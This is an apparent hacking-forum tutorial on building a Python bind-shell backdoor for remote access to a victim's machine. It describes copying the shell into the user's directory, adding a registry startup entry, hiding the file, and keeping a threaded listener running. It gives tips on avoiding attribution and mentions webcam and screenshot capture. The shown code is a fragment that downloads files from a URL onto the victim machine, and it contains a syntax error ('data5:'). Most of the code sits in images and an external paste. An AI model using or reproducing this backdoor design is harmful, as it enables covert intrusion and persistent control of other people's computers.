How to Create a Bind Shell in Python

Aug 19, 2015 08:11 PM
Aug 19, 2015 08:16 PM

Hi guys, I'm gonna keep this short because I got assignments and a lot of notes to study and also other how-tos and forums to reads. lol...Since I'm keeping this short...no story time just scenario. And I want to thank n3stor for giving me the idea to post this.

Scenario

Let's say you have a target to hack and you want to be able to remote access the victim(duh!). I think the most effective backdoor is the reverse shell because you get a connection no matter what! But what if someone finds it and reverse engineers it, you don't want them to know your IP address and they will even if you clear logs. But if you use a bind shell, though you will have to connect yourself and it is less likely that you will get in and also that it is loud, if you clear the logs, reverse engineering of the backdoor can't get you, so cool huh ;)

Step 1: Import Modules and Maintain Access

So first, you have to import the modules that you will use for our backdoor.

635755853894511944.jpg

socket - for network connections

thread - so you can get multiple connections

subprocess - so you can run system commands

Now I am going to explain the subprocess calls. It assumes you run it from a USB

  • it copies the shell to the current user's directory
  • adds the bind shell to the registry so it always runs on system startup
  • hides the bind shell so it cannot be found easily

Step 2: Main Program

This is where the whole main code is.

635755869223019868.jpg

This part contains what happens after you have got a connection.

Now we don't want just anyone to be using our backdoor so i added authentication to it. Didn't have time to change the username but feel free. And make sure you change it(don't want to be in trouble because of script kiddies....lol) . and you can download more stuff with the wget there ;) ...lol so anyway that's pretty much it...nothing much to it.

Step 3: Persistence

This part of the code mainly makes sure that you will always be ready to receive a connection even if an error causes the socket to close.

635755858529477661.jpg

It also creates a thread so that there can be more than one connection simultaneously(hope that makes sense!!). And obviously, there can only be a maximum of 5 connections. :D

Conclusion

So that is pretty much it. I added more functionality to the improved one i have like download and upload of files from and to the victim's computer, webcam and screenshot. They are not too difficult so I'm sure you can figure that out for yourself. Well happy hacking folks. And don't forget to check out n3stor's tutorial on the reverse shell.

I have pasted the code on pastebin

http://pastebin.com/GzZp6K7a

EDIT: Sorry for any typos or errors in my English. And also there is a mistake in the pastebin code post for the wget part of it.

elif data.strip('\r\n').startswith('wget'):

try:

f = open(os.path.basename(data5:), "wb")

f.write(urllib2.urlopen(data5:).read())

f.close()

conn.send("Successfully downloaded %s" %os.path.basename(data5:))

except:

conn.send("Download failed!")

I forgot the .read() function. I'm sorry

Comments

No Comments Exist

Be the first, drop a comment!